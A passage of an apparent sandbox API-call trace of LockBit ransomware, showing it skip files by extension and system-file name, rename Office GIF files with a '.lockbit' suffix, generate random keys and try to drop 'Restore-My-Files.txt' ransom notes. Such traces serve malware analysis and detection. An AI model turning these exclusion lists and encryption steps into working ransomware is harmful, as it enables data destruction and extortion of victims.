ftLastAccessTime.dwLowDateTime=0xbce87320, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb3c0dc00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21400_.GIF", cAlternateFileName="")) returned 1 [0204.599] lstrcmpiW (lpString1=".", lpString2="BD21400_.GIF") returned -1 [0204.600] lstrcmpiW (lpString1="..", lpString2="BD21400_.GIF") returned -1 [0204.600] PathFindExtensionW (pszPath="BD21400_.GIF") returned=".GIF" [0204.600] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.600] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.600] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.600] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.600] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.600] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.600] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.600] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.600] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.600] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.600] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.600] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.601] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.601] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.601] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.601] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.601] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21400_.GIF") returned 1 [0204.601] lstrcmpiW (lpString1="ntldr", lpString2="BD21400_.GIF") returned 1 [0204.601] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21400_.GIF") returned 1 [0204.601] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21400_.GIF") returned 1 [0204.602] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21400_.GIF") returned -1 [0204.602] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21400_.GIF") returned 1 [0204.602] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21400_.GIF") returned 1 [0204.602] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.602] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF") returned=".GIF" [0204.602] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.602] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.602] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.602] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.602] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.602] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.602] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.602] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.602] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.602] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.603] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.603] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.603] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.603] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.603] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.603] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.603] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF.lockbit") returned 78 [0204.603] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21400_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.606] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.606] malloc (_Size=0x40068) returned 0x3df0008 [0204.606] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=233) returned 1 [0204.606] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.606] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.607] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.607] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.612] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.612] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.612] free (_Block=0x1fa2ed8) [0204.612] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21400_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.613] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.613] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.613] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac6b100, ftCreationTime.dwHighDateTime=0x1bd8f93, ftLastAccessTime.dwLowDateTime=0xbce87320, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xac6b100, ftLastWriteTime.dwHighDateTime=0x1bd8f93, nFileSizeHigh=0x0, nFileSizeLow=0x11f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21421_.GIF", cAlternateFileName="")) returned 1 [0204.613] lstrcmpiW (lpString1=".", lpString2="BD21421_.GIF") returned -1 [0204.613] lstrcmpiW (lpString1="..", lpString2="BD21421_.GIF") returned -1 [0204.613] PathFindExtensionW (pszPath="BD21421_.GIF") returned=".GIF" [0204.613] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.613] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.613] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.613] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.613] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.613] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.613] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.613] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.613] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.613] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.613] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.613] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.613] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.614] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.614] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.614] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.614] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21421_.GIF") returned 1 [0204.614] lstrcmpiW (lpString1="ntldr", lpString2="BD21421_.GIF") returned 1 [0204.614] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21421_.GIF") returned 1 [0204.614] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21421_.GIF") returned 1 [0204.614] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21421_.GIF") returned -1 [0204.614] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21421_.GIF") returned 1 [0204.614] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21421_.GIF") returned 1 [0204.614] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.614] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF") returned=".GIF" [0204.615] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.615] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.615] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.615] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.615] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.615] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.615] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.615] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.615] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.616] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.616] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.616] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.616] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.616] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.616] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.616] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.616] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF.lockbit") returned 78 [0204.616] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21421_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.618] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.618] malloc (_Size=0x40068) returned 0x3df0008 [0204.618] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=287) returned 1 [0204.618] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.619] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.619] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.619] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.625] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.625] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.625] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.625] free (_Block=0x1fa2ed8) [0204.625] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21421_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.625] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.625] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.625] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac6b100, ftCreationTime.dwHighDateTime=0x1bd8f93, ftLastAccessTime.dwLowDateTime=0xbce87320, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xac6b100, ftLastWriteTime.dwHighDateTime=0x1bd8f93, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21422_.GIF", cAlternateFileName="")) returned 1 [0204.625] lstrcmpiW (lpString1=".", lpString2="BD21422_.GIF") returned -1 [0204.625] lstrcmpiW (lpString1="..", lpString2="BD21422_.GIF") returned -1 [0204.625] PathFindExtensionW (pszPath="BD21422_.GIF") returned=".GIF" [0204.625] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.625] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.625] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.625] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.625] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.625] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.625] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.625] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.625] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.625] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.625] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.625] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.626] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.626] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.626] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.626] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.626] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.626] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.626] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.626] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.627] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.627] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.627] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.627] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.627] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.627] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.627] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.627] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21422_.GIF") returned 1 [0204.627] lstrcmpiW (lpString1="ntldr", lpString2="BD21422_.GIF") returned 1 [0204.627] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21422_.GIF") returned 1 [0204.627] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21422_.GIF") returned 1 [0204.627] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21422_.GIF") returned -1 [0204.627] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21422_.GIF") returned 1 [0204.627] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21422_.GIF") returned 1 [0204.627] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.627] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21422_.GIF") returned=".GIF" [0204.627] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.627] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.627] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.627] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.627] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.627] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.627] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.627] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.627] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.627] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.627] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.627] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.628] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.628] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.628] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.628] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.628] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.628] 